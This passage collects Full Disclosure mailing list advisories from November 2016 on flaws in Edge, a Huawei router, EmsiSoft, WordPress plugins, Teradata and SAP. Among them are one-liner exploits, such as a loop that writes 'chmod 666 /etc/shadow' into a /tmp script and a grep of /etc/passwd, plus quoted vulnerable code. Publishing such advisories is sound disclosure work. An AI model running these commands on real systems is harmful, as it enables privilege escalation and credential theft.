date:20161118

L.S.

Over the past decade, heap sprays have become almost synonymous with
exploits in web-browsers. After having developed my first practical
implementation of a heap spray about ten years ago, I found that the
amount of memory needed in some cases was too much for a realistic
attack scenario. I needed a new kind of heap spray that did not allocate
as much RAM as traditional heap sprays do. So, I developed a heap spray
that uses significantly less RAM than a traditional heap spray does. In
practice it uses about 33% less in most cases, but theoretically it
could be much, mush less in ideal situations. This
technique requires only the ability to free some of the blocks of memory
used to spray the heap during spraying and should otherwise be
applicable to every existing implementation.

I wrote an article on my blog that describes the technical details of
this technique, you can find it here:

http://blog.skylined.nl/20161118001.html

I recently used this technique in a Proof-of-Concept for a vulnerability
in Microsoft Edge. You can find details about that vulnerability and the
PoC here:

http://blog.skylined.nl/20161118002.html

Cheers,

SkyLined


0x2557C5AA.asc
Description: application/pgp-keys


signature.asc
Description: OpenPGP digital signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2016-3247 Microsoft Edge CTextExtractor::GetBlockText OOB read details

Throughout November, I plan to release details on vulnerabilities I
found in web-browsers which I've not released before. This is the
fourteenth entry in that series. Unfortunately I won't be able to
publish everything within one month at the current rate, so I may
continue to publish these through December and January.

The below information is available in more detail on my blog at
http://blog.skylined.nl/20161118002.html.

Follow me on http://twitter.com/berendjanwever for daily browser bugs.

Microsoft Edge CTextExtractor::GetBlockText OOB read
=
(MS16-104, CVE-2016-3247)

Synopsis

A specially crafted web-page can cause an integer underflow in Microsoft
Edge. This causes `CTextExtractor::GetBlockText` to read data outside of
the bounds of a memory block.

Known affected software, attack vectors and mitigations
---
* Microsoft Edge 11.0.10240.16384
  An attacker would need to get a target user to open a specially
  crafted web-page. JavaScript is not necessarily required to trigger
  the issue.

Description
---
Though I did not investigate thoroughly, I did find out the following:
* The root cause appears to be an integer underflow in a 32-bit
  variable used in `CTextExtractor..GetBlockText` as an index to read a
  `WCHAR` in a string buffer. This index is decreased once too often
  and becomes -1, or a very large positive number depending on how it
  is used.
* This does not result in a crash on 32-bit systems, as an integer wrap
  causes the code to read one `WCHAR` before the start of the buffer,
  which is normally also in allocated memory.
* On 64-bit systems, the 32-bit -1 value is interpreted as 0x,
  a very large positive value. As this is an index into a `WCHAR`
  string, it gets multiplied by two and added to the start of the
  buffer to find the location of a `WCHAR` to read. This causes the OOB
  read to be around 8Gb (!!) beyond the address at which the buffer is
  allocated.
* The crash happens in code that appears to be rendering the web-page,
  which does not immediately offer an obvious way of extracting
  information using this bug.

Exploit
---
This is where it gets interesting, as the OOB read happens
approximately 0x2` bytes after the address at which the buffer
is allocated. This presents us with a problem: how to store some
information that we'd be interested in reading at such a large offset
from the original allocation?

As one might come to expect from me, I used a heap spray. But it needed
to be a special kind of heap spray as I did not want to actually have to
allocate 8Gb of RAM. However, about ten years ago (boy, time flies!) I
developed a heap spray that uses significantly less RAM than a
traditional heap spray does; in practice probably about 33% in most
cases, but theoretically much more in ideal situations. I've been
meaning to blog about it, but never found the time to do so until today:
you can read all about it here:

http://blog.skylined.nl/20161118001.html

That said, I have not actually looked at whether it is possible to
exfiltrate useful information using this bug. However, I did write a
Proof-of-Concept that attempts to make sure something is allocated in
the area where the OOB read happens. This PoC uses these heap spray
tricks to spray the heap while minimizing memory use. The
Proof-of-Concept uses about ~5.3Gb to allocate the memory at around 8Gb
distance from the buffer (up to ~10Gb to be sure). When you load the PoC
in a 64-bit version of Edge, you may notice that, unlike the original
repro, it will not crash Edge (even though it does trigger the
issues): the heap spray has allocated the memory that the out-of-bounds
read accesses, and this prevents an access violation exception.
Refreshing the page is likely to screw up the precise allocation process
needed and will probably cause a crash.

This proves that it is theoretically possible to allocate information at
the address used by the code. All that is left is prove that the
information read by the code can be exfiltrated somehow, and you have a
working exploit. This is left as an exercises to the reader.

Time-line
-
* June 2016: This vulnerability was found through fuzzing.
* June 2016: This vulnerability was submitted to ZDI and iDefense.
* July 2016: This vulnerability was acquired by ZDI.
* September 2016: This vulnerability was addressed by Microsoft in
  MS16-104.
* November 2016: Details of this issue are released.

Cheers,

SkyLined


0x2557C5AA.asc
Description: application/pgp-keys


signature.asc
Description: OpenPGP digital signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Huawei Flybox B660 3G/4G Router - Auth Bypass Vulnerability

Document Title:
===
Huawei Flybox B660 3G/4G Router - Auth Bypass Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2010

Huawei ID: 558969357627813


Release Date:
=
2016-11-18


Vulnerability Laboratory ID (VL-ID):

2010


Common Vulnerability Scoring System:

7.4


Product & Service Introduction:
===
The Huawei B660 has a web interface for configuration. You can use any web 
browser you like to login to the Huawei B660.

(Copy of the Homepage: 
http://setuprouter.com/router/huawei/b660/manual-1184.pdf )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a security flaw that 
affects the official Huawei Flybox B660 3g/4g router product series.


Vulnerability Disclosure Timeline:
==
2016-11-18: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Huawei
Product: Flybox - Router (Web-Application) B660 3G/4G


Exploitation Technique:
===
Remote


Severity Level:
===
Critical


Technical Details & Description:

A remote auth bypass vulnerability has been discovered in the official Huawei 
Flybox B660 3g/4g router product series.
The security vulnerability allows remote attackers to compromise any Huawei 
Flybox B660 
Admin Panel using a new a bypass method.

The vulnerability is located in the `./htmlcode/html/` modules and 
`indexdefault.asp ` file of 
localhost path URL. Remote attackers are able to compromise any Huawei Flybox 
B660  admin panel
via unauthenticated GET method request. 

The security risk of the issue is estimated as critical with a cvss count of 
7.4. (CVSS 7.4)
Exploitation of the web vulnerability requires no privileged account or user 
interaction. 
Successful exploitation of the vulnerability results in compromise of the 
huawei flybox device.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] /htmlcode/html/

Vulnerable File(s):
[+] indexdefault.asp


Software version of the modem:
1066.12.15.01.200

Hardware version of the modem:
WLB3TCLU

Name of the device:
B660

Hardware version of the router:
WL1B660I001

Software version of the router:
1066.11.15.02.110sp01


Proof of Concept (PoC):
===
The vulnerability can be exploited by remote attackers without privileged user 
account or user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

After buying a Flybox Huawei B660, the company setup a password for you like: 
"admin", "12345" or "5"
We figured out that when you lose your password, you can perform to connect 
multiple times by using the plain passwords above.
After the third request the connection will be refused by an exception message, 
by intercepting the request and passing the error 
it is possible to bypass the authentication mechanism of the 3g/4g router 
device. The problem in Flybox Huawei B660 is the following, 
there is no test if the password false or true. If an attacker tries the false 
password of many times on requests they redirect you 
after the bypass of the error to change your password permanently.


--- PoC Session Logs [GET] ---
GET /htmlcode/html/contentdefault.asp HTTP/1.1
Host: localhost
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8
Cookie: login_url=settings; 
CNZZDATA1260483764=1049902387-1478277586-%7C1478277586; Basic=index; 
Language=en; SessionID_R3=1006428909
Referer: http://localhost/htmlcode/html/content.asp
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/54.0.2840.59 Safari/537.36 OPR/41.0.2353.46
HTTP/1.1 200 OK
CACHE-CONTROL: no-cache
Content-Length: 5776
Content-Type: text/html


PoC Video: https://www.youtube.com/watch?v=-xzedPTNv6c 


Solution - Fix & Patch:
===
N/A


Security Risk:
==
The security risk of the remote vulnerability in the Huawei Flybox B660 3G74G 
router is estimated as critical. (CVSS 7.4)



Credits & Authors:
==
SaifAllah benMassaoud - ( 
http://www.vulnerability-lab.com/show.php?user=SaifAllahbenMassaoud )



Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential 
loss of business prof

[FD] Executable installers are vulnerable^WEVIL (case 41): EmsiSoft's Emergency Kit allows elevation of privilege for everybody

2016-11-18 Thread Stefan Kanthak

Hi @ll,

in response to 
EmsiSoft fixed some of the DLL hijacking vulnerabilities in some
of their executable installers and unpackers.

EmsisoftEmergencyKit.exe still has beginner's errors which allow
escalation of privilege for EVERY local user:

0. while the self-extracting WinRAR archive EmsisoftEmergencyKit.exe
   doesn't load DLLs from its "application directory" any more, its
   payload but shows this vulnerability!

1. due to "requireAdministrator" in its application manifest the
   self-extractor runs with administrative rights, although it
   neither needs them nor uses them.

2. it creates the directory "%SystemDrive%\EEK" and unpacks its
   payload into it.

   JFTR: since it runs with administrative rights the self-
 extractor could create "%SystemDrive%\EEK" with an ACL
 that only allows write-access for administrators, or
 use "%ProgramFiles%\EmsiSoft\Emergency Kit" instead.

   This directory inherits the ACL of its parent, %SystemDrive%,
   which allows write access for unprivileged users; they can thus
   modify all files extracted there or add files, for example a
   "%SystemDrive%\EEK\Version.dll".

   Also give NetAPI32.dll, NetUtils.dll, SrvCli.dll, WksCli.dll,
   PropSys.dll, AppHelp.dll, NTMarta.dll, Secur32.dll, MPR.dll and
   CSCAPI.dll a try.

3. the programs "%SystemDrive%\EEK\Start Commandline Scanner.exe"
   and "%SystemDrive%\EEK\Start Emergency Kit Scanner.exe" have
   "requireAdministrator" in their application manifests too: they
   load and execute the DLLs named above from "%SystemDrive%\EEK"
   with administrative rights.

4. the other programs extracted to "%SystemDrive%\EEK\bin32" and
   "%SystemDrive%\EEK\bin64" and are also run with administrative
   rights.

5. of course the programs in "%SystemDrive%\EEK\bin32" and
   "%SystemDrive%\EEK\bin64" load and execute DLLs from their
   "application directory" (which is writable for everyone) too.

And one more:

6. the OpenSSL libraries shipped are from version 1.0.2d and have
   multiple vulnerabilities which have beed fixed in version 1.0.2j.


stay tuned
Stefan Kanthak


Timeline:
~

2016-08-29vulnerability report sent to vendor

2016-08-29vendor acknowledges vulnerability, promises to update
  at least the OpenSSL libraries, and ask the author of
  WinRAR to add a directive to protect the created EEK
  directory

2016-11-17vendor fixed NOTHING in the past ELEVEN weeks, and
  does not react any more -> report published

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SQL injection and unserialization vulnerability in Relevanssi Premium could allow admins to execute arbitrary code (in some circumstances) (WordPress plugin)

Details

Software: Relevanssi Premium
Version: v1.14.4
Homepage: https://www.relevanssi.com/
Advisory report:
https://security.dxw.com/advisories/sql-injection-and-unserialization-vulnerability-in-relevanssi-premium-could-allow-admins-to-execute-arbitrary-code-in-some-circumstances/
CVE: Awaiting assignment
CVSS: 9 (High; AV:N/AC:L/Au:S/C:C/I:C/A:C)

Description

SQL injection and unserialization vulnerability in Relevanssi Premium could
allow admins to execute arbitrary code (in some circumstances)

Vulnerability

Relevanssi has a search function on the admin side that is not visible in the
user interface, however the code is there and can be called. This functionality
contains an sql injection, and this sql injection can be exploited to pass user
controlled values into an unserialization call and run arbitrary code (if there
are classes available with particular methods such as __destruct).

If a logged in admin user is tricked into going to an attacker controlled
website, JavaScript could be written to make the admins browser submit the
above request, without their knowledge (see 2.3 Social engineering, p.18).
Alternatively this attack can be exploited by an attacker with Admin privileges.

Proof of concept

Achieving arbitrary code execution depends on which classes are available (i.e.
which plugins and themes are installed and active). It won’t be possible in all
situations.

Mitigations

Upgrade to version 1.14.6.1 or later.

Disclosure policy

dxw believes in responsible disclosure. Your attention is drawn to our
disclosure policy: https://security.dxw.com/disclosure/

Please contact us on secur...@dxw.com to acknowledge this report if you
received it via a third party (for example, plug...@wordpress.org) as they
generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this
report with 14 days.

Timeline

2016-10-07: Discovered
2016-11-01: Reported
2016-11-02: Vendor reported fixed
2016-11-17: Requested CVE
2016-11-17: Advisory published

Discovered by dxw:

Glyn Wintle
Please visit security.dxw.com for more information.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Unserialization vulnerability in Relevanssi Premium could allow admins to execute arbitrary code (in some circumstances) (WordPress plugin)

Details

Software: Relevanssi Premium
Version: v1.14.4
Homepage: https://www.relevanssi.com/
Advisory report:
https://security.dxw.com/advisories/unserialization-vulnerability-in-relevanssi-premium-could-allow-admins-to-execute-arbitrary-code-in-some-circumstances/
CVE: Awaiting assignment
CVSS: 9 (High; AV:N/AC:L/Au:S/C:C/I:C/A:C)

Description

Unserialization vulnerability in Relevanssi Premium could allow admins to
execute arbitrary code (in some circumstances)

Vulnerability

If logged in as an admin on any site you can go to settings, Relevanssi
Premium, import or export options. This is a text field that accepts a
serialised PHP object. It is possible to submit a string that contains an evil
encoded object that executes arbitrary code (if there are classes available
with particular methods such as __destruct).

Proof of concept

Achieving arbitrary code execution depends on which classes are available (i.e.
which plugins and themes are installed and active). It won’t be possible in all
situations.

Mitigations

Upgrade to version 1.14.6.1 or later.

Disclosure policy

dxw believes in responsible disclosure. Your attention is drawn to our
disclosure policy: https://security.dxw.com/disclosure/

Please contact us on secur...@dxw.com to acknowledge this report if you
received it via a third party (for example, plug...@wordpress.org) as they
generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this
report with 14 days.

Timeline

2016-10-07: Discovered
2016-11-01: Reported
2016-11-02: Vendor reported fixed
2016-11-17: Requested CVE
2016-11-17: Advisory published

Discovered by dxw:

Glyn Wintle
Please visit security.dxw.com for more information.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Unserialisation in Post Indexer could allow man-in-the-middle to execute arbitrary code (in some circumstances) (WordPress plugin)

Details

Software: Post Indexer
Version: 3.0.6.1
Homepage: http://premium.wpmudev.org/project/post-indexer/
Advisory report: 
https://security.dxw.com/advisories/unserialisation-in-post-indexer-could-allow-man-in-the-middle-to-execute-arbitrary-code-in-some-circumstances/
CVE: Awaiting assignment
CVSS: 7.6 (High; AV:N/AC:H/Au:N/C:C/I:C/A:C)

Description

Unserialisation in Post Indexer could allow man-in-the-middle to execute 
arbitrary code (in some circumstances)

Vulnerability




Twice a day the blog makes an automated unencrypted HTTP request to 
premium.wpmudev.org and the value that is returned is passed to unserialize(). 
It is possible for premium.wpmudev.org or any one on the network in a 
man-in-the-middle position to return a string that contains an evil encoded 
object that executes arbitrary code (depending on the active plugins and 
themes).
This code is called twice a day by wp_schedule_event(time(), \'twicedaily\', 
\'wpmudev_scheduled_jobs\') (extra/wpmudev-dash-notification.php):



var $server_url = \'http://premium.wpmudev.org/wdp-un.php\'; // line 12
$url = $this->server_url . \'?action=check&un-version=3.3.3&wp=\' . 
urlencode($wp) . \'&bcount=\' . $blog_count . \'&domain=\' . 
urlencode(network_site_url()) . $projects; // line 393
$response = wp_remote_get($url, $options); // line 400
$data = $response[\'body\']; // line 402
$data = unserialize($data); // line 404
There is a class called ProcessLocker in this plugin with an exploitable 
__destruct method, which could be used as a jumping-off point for attacks using 
this unserialize() vulnerability (or the use of unserialize() in WordPress core 
which requires access to the database to exploit).

Proof of concept

Achieving arbitrary code execution depends on which classes are available (i.e. 
which plugins and themes are installed and active). It won’t be possible in all 
situations.

Mitigations

Upgrade to version 3.0.6.2 or later.

Disclosure policy

dxw believes in responsible disclosure. Your attention is drawn to our 
disclosure policy: https://security.dxw.com/disclosure/

Please contact us on secur...@dxw.com to acknowledge this report if you 
received it via a third party (for example, plug...@wordpress.org) as they 
generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this 
report with 14 days.

Timeline


2016-11-01: Discovered
2016-11-14: Reported to plugin author via https://premium.wpmudev.org/contact/
2016-11-14: Plugin author responded
2016-11-17: Confirmed that version 3.0.6.2 fixes the issue
2016-11-17: Requested CVE
2016-11-17: Advisory published



Discovered by dxw:

Glyn Wintle
Please visit security.dxw.com for more information.
  


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SQL Injection in Post Indexer allows super admins to read the contents of the database (WordPress plugin)

Details

Software: Post Indexer
Version: 3.0.6.1
Homepage: http://premium.wpmudev.org/project/post-indexer/
Advisory report: 
https://security.dxw.com/advisories/sql-injection-in-post-indexer-allows-super-admins-to-read-the-contents-of-the-database/
CVE: Awaiting assignment
CVSS: 4 (Medium; AV:N/AC:L/Au:S/C:P/I:N/A:N)

Description

SQL Injection in Post Indexer allows super admins to read the contents of the 
database

Vulnerability




Post Indexer does not use prepared queries in many cases and in some of its 
database calls it uses backticks (`). These are not automatically escaped by 
WordPress, thus leading to the possibility of SQL injection.
In other places in the code it simply takes user controlled values and adds 
them to SQL queries.
An example of this is remove_post_older_than:



// classes/class.model.php line 589
function remove_posts_older_than( $unit, $period ) {
// ...
$sql = $this->db->prepare( \"SELECT BLOG_ID, ID FROM {$this->network_posts} 
WHERE DATE_ADD(post_date, INTERVAL %d \" . $period . \") < CURRENT_DATE() LIMIT 
%d\", $unit, PI_CRON_TIDY_DELETE_LIMIT );
$posts = $this->db->get_results( $sql );
// ...
}




The value of $period is user-controlled and could easily be replaced with SQL:



// classes/cron.postindexerrebuild.php line 310
function process_tidy_agedposts($DEBUG = false) {
// ...
// The default is to remove posts from the index when they are over a year 
old
$agedposts = get_site_option( \'postindexer_agedposts\', array( 
\'agedunit\' => 1, \'agedperiod\' => \'year\' ) );
// ...
$this->model->remove_posts_older_than( $agedposts[\'agedunit\'], 
$agedposts[\'agedperiod\'] );
// ...
}



To exploit this vulnerability you need to be a super admin.




Proof of concept


Mitigations

Upgrade to version 3.0.6.2 or later.

Disclosure policy

dxw believes in responsible disclosure. Your attention is drawn to our 
disclosure policy: https://security.dxw.com/disclosure/

Please contact us on secur...@dxw.com to acknowledge this report if you 
received it via a third party (for example, plug...@wordpress.org) as they 
generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this 
report with 14 days.

Timeline


2016-11-01: Discovered
2016-11-14: Reported to plugin author via https://premium.wpmudev.org/contact/
2016-11-14: Plugin author responded
2016-11-17: Confirmed that version 3.0.6.2 fixes the issue
2016-11-17: Requested CVE
2016-11-17: Advisory published



Discovered by dxw:

Glyn Wintle
Please visit security.dxw.com for more information.
  


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] /tmp race condition in Teradata Studio Express v15.12.00.00 studioexpressinstall

2016-11-18 Thread Larry W. Cashdollar

Title: /tmp race condition in Teradata Studio Express v15.12.00.00 
studioexpressinstall
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-03
Download Site: 
http://downloads.teradata.com/download/tools/teradata-studio-express
Vendor: Teradata
Vendor Notified: 2016-10-03
Vendor Contact: web form contact
Description: Teradata Studio Express provides an information discovery tool 
that retrieves data from Teradata Database systems and allows the data to be 
manipulated and stored on the desktop. It is built on the Eclipse Rich Client 
Platform (RCP). 
Vulnerability:
The installation script for TeradataStudioExpress.15.12.00.00 creates files in 
/tmp insecurely.  A malicious local user could create a symlink in /tmp and 
possibly clobber system files or perhaps elevate privileges.

$ grep -n "/tmp" studioexpressinstall 

33:ASKDIRFILE=/tmp/sqlajeaskdir
41:DEF_TRACEFILE=/tmp/studioexinstall.log
44:TMP=/tmp
72:SQLAJEINPUTS=/tmp/studioexinputs
90:RPM_OUT_FILE=/tmp/studioexinstall_rpmcmd.out
103:SQLAJEINSTALL=/tmp/studioexpressinstall
136:   java -version > "/tmp/javaver" 2>&1
137:   verstring=`grep "java version" /tmp/javaver`
143:  jre64b=`grep "64-Bit" /tmp/javaver`
212:rm -f /tmp/javaver 
341:   tmptracefile=/tmp/studioexinstall.log.tmp#Temporary trace file.
588:touch /tmp/checkstudioexinstall
603:rm -f /tmp/checkstudioexinstall
604:rm -f /tmp/studioexinstall_rpmcmd.out

CVE-ID: CVE-2016-7490
Export: JSON TEXT XML
Exploit Code:
• $ ln -s /tmp/javaver /etc/passed
Advisory: http://www.vapidlabs.com/advisory.php?v=174

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp

2016-11-18 Thread Larry W. Cashdollar

Title: Teradata Virtual Machine Community Edition v15.10 Insecure creation of 
files in /tmp
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-01
Download Site: 
http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware
Vendor: Teradata
Vendor Notified: 2016-10-01
Vendor Contact: web form contact
Description: Teradata is a relational database, they provide a Virtual Machine 
image for developers and community use.
Vulnerability:
 Teradata Virtual Machine Community Edition v15.10 Insecure creation of files 
in /tmp may lead to elevated code execution.
In /opt/teradata/gsctools/bin/t2a.pl

320 `chmod +x /tmp/$PROG.get_profile.scr ; /tmp/$PROG.get_profile.scr 
>/dev/null 2>&1` ;

If a regular user controls  /tmp/t2a.pl.get_profile.scr before the person 
executing this script creates it they can inject
commands to be executed as that user.

for example:

$ while(true) do echo "chmod 666 /etc/shadow" >  /tmp/t2a.pl.get_profile.scr; 
done

If root or any other account runs that .pl script I see these files being 
created in /tmp

[C] -rw-r- 1 root root 14  Mon Oct  3 13:03:59 2016 
/tmp/t2a.vprocmanager.cmd
[U] -rw-r- 1 root root 14  Mon Oct  3 13:03:59 2016 
/tmp/t2a.vprocmanager.cmd
[C] -rw-r- 1 root root 0  Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager
[C] -rw-r- 1 root root 0  Mon Oct  3 13:03:59 2016 
/tmp/t2a.vprocmanager.stderr
[U] -rw-r- 1 root root 44  Mon Oct  3 13:03:59 2016 
/tmp/t2a.vprocmanager.stderr
[U] -rw-r- 1 root root 152  Mon Oct  3 13:03:59 2016 
/tmp/t2a.vprocmanager.stderr
[C] -rw-r- 1 root root 5  Mon Oct  3 13:03:59 2016 /tmp/t2a.get_profile.scr
[U] -rw-r- 1 root root 5  Mon Oct  3 13:03:59 2016 /tmp/t2a.get_profile.scr
[M] -rwxr-x--- 1 root root 5  Mon Oct  3 13:03:59 2016 /tmp/t2a.get_profile.scr 
 

CVE-ID: CVE-2016-7489
Exploit Code:
• $ while(true) do echo "chmod 666 /etc/shadow" >  
/tmp/t2a.pl.get_profile.scr; done
Advisory: www.vapidlabs.com/advisory.php?v=173

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [ERPSCAN-16-032] SAP Telnet Console – Directory traversal vulnerability

2016-11-18 Thread ERPScan inc

Application: SAP NetWeaver AS JAVA

Versions Affected: SAP NetWeaver AS JAVA 7.1 to 7.5

Vendor URL: http://SAP.com

Bugs: Directory traversal

Sent: 04.12.2015

Reported: 05.12.2015

Vendor response: 05.12.2015

Date of Public Advisory: 09.08.2016

Reference: SAP Security Note 2280371

Author: Mathieu Geli (ERPScan)

Description

1. ADVISORY INFORMATION

Title: [ERPSCAN-16-032] SAP Telnet Console – Directory traversal vulnerability

Advisory ID:[ERPSCAN-16-032]

Risk: high

Advisory URL:
https://erpscan.com/advisories/erpscan-16-032-sap-netweaver-telnet-console-file-disclosure/

Date published: 11.11.2016

Vendors contacted: SAP

2. VULNERABILITY INFORMATION

Class: Directory traversal

Impact: read file from system

Remotely Exploitable: yes

Locally Exploitable: yes

CVSS Information

CVSS Base Score v3: 3.4 / 10

CVSS Base Vector:

AV : Attack Vector (Related exploit range) Adjacent (A)

AC : Attack Complexity (Required attack complexity) Low (L)

PR : Privileges Required (Level of privileges needed to exploit) High (H)

UI : User Interaction (Required user participation) None (N)

S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component)

Changed (C)

C : Impact to Confidentiality

Low (L)

I : Impact to Integrity None (N)

A : Impact to Availability None (N)

3. VULNERABILITY DESCRIPTION

An authenticated user can disclose file content outside of the JVM
through the SAP Telnet Console service.

4. VULNERABLE PACKAGES

J2EE ENGINE SERVERCORE 7.10

J2EE ENGINE SERVERCORE 7.11

J2EE ENGINE SERVERCORE 7.20

J2EE ENGINE SERVERCORE 7.30

J2EE ENGINE SERVERCORE 7.31

J2EE ENGINE SERVERCORE 7.40

J2EE ENGINE SERVERCORE 7.50

5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2280371

6. AUTHOR

Mathieu Geli (ERPScan)

7. TECHNICAL DESCRIPTION

SAP Netweaver Telnet Console File Disclosure via the GREP command of
the SYSTEM admin group.

7.1. Proof of Concept

GREP ":" /etc/passwd

at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash

bin:x:1:1:bin:/bin:/bin/bash

daemon:x:2:2:Daemon:/sbin:/bin/bash

[...]

8. REPORT TIMELINE

Sent: 04.12.2015

Reported: 05.12.2015

Vendor response: 05.12.2015

Date of Public Advisory: 09.08.2016

9. REFERENCES

https://erpscan.com/advisories/erpscan-16-032-sap-netweaver-telnet-console-file-disclosure/

10. ABOUT ERPScan Research

ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).

ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.

ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents ( e.g. BlackHat, RSA, HITB) and conducted private
trainings for several Fortune 2000 companies.

ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.

ERPScan experts were interviewed in specialized info-sec resources and
featured in major media worldwide. Among them there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.

Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.

11. ABOUT ERPScan

ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP
Solution providers” and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.

ERPScan’s primary mission is to close the gap between technical and
business security and provide solutions for CISO's to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.

We ‘follow the sun’ and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
c

[FD] [ERPSCAN-16-031] SAP NetWeaver AS ABAP – directory traversal using READ DATASET

2016-11-18 Thread ERPScan inc

Application: SAP NetWeaver AS ABAP

Versions Affected: SAP NetWeaver AS ABAP 7.4

Vendor URL: http://SAP.com

Bugs: Directory traversal

Sent: 22.04.2016

Reported: 23.04.2016

Vendor response: 23.04.2016

Date of Public Advisory: 09.08.2016

Reference: SAP Security Note 2312966

Author: Daria Prosochkina (ERPScan)

Description

1. ADVISORY INFORMATION

Title: [ERPSCAN-16-031] SAP NetWeaver AS ABAP – directory traversal
using READ DATASET

Advisory ID: [ERPSCAN-16-031]

Risk: high

Advisory URL:
https://erpscan.com/advisories/erpscan-16-031-sap-netweaver-abap-directory-traversal-via-using-read-dataset/

Date published: 11.11.2016

Vendors contacted: SAP

2. VULNERABILITY INFORMATION

Class: Directory traversal

Impact: read file from system

Remotely Exploitable: yes

Locally Exploitable: yes

CVSS Information

CVSS Base Score v3: 4.3 / 10

CVSS Base Vector:

AV : Attack Vector (Related exploit range) Network (N)

AC : Attack Complexity (Required attack complexity) Low (L)

PR : Privileges Required (Level of privileges needed to exploit) Low (L)

UI : User Interaction (Required user participation) None (N)

S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Unchanged (U)

C : Impact to Confidentiality Low (L)

I : Impact to Integrity None (N)

A : Impact to Availability None (N)

3. VULNERABILITY DESCRIPTION

The code provides access to the file specified after the READ DATASET
statement. The variable transmitted to the input of the statement is
entered in it by user input. Thus, the user can access the files
stored on the operating system. This vulnerability is called a
Directory Traversal.

The attack is possible if the application does not check the user data
and does not delete special characters used for a directory traversal
attack from the variable, in which the filename is passed. As a
result, an attacker can read data from all files, to which the
application has access.

To discover this vulnerability, data flow analysis and other unique
techniques are used.

4. VULNERABLE PACKAGES

SAP_ABA 700

SAP_ABA 701

SAP_ABA 702

SAP_ABA 710

SAP_ABA 711

SAP_ABA 730

SAP_ABA 731

SAP_ABA 740

SAP_ABA 750

SAP_ABA 751

SAP_ABA 75A

SAP_ABA 75B

5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2312966

6. AUTHOR

Daria Prosochkina (ERPScan)

7. TECHNICAL DESCRIPTION

Attacker can read any file from OS with use BUPA_BIP_FILE_IMPORT program.

Filename used in statement READ DATASET (line 428) is entered in this
statement by user input. User can pass to input arbitrary filepath,
for example /etc/passwd. As a result of execution of the
BUPA_BIP_FILE_IMPORT program, data from /etc/passwd will be written in
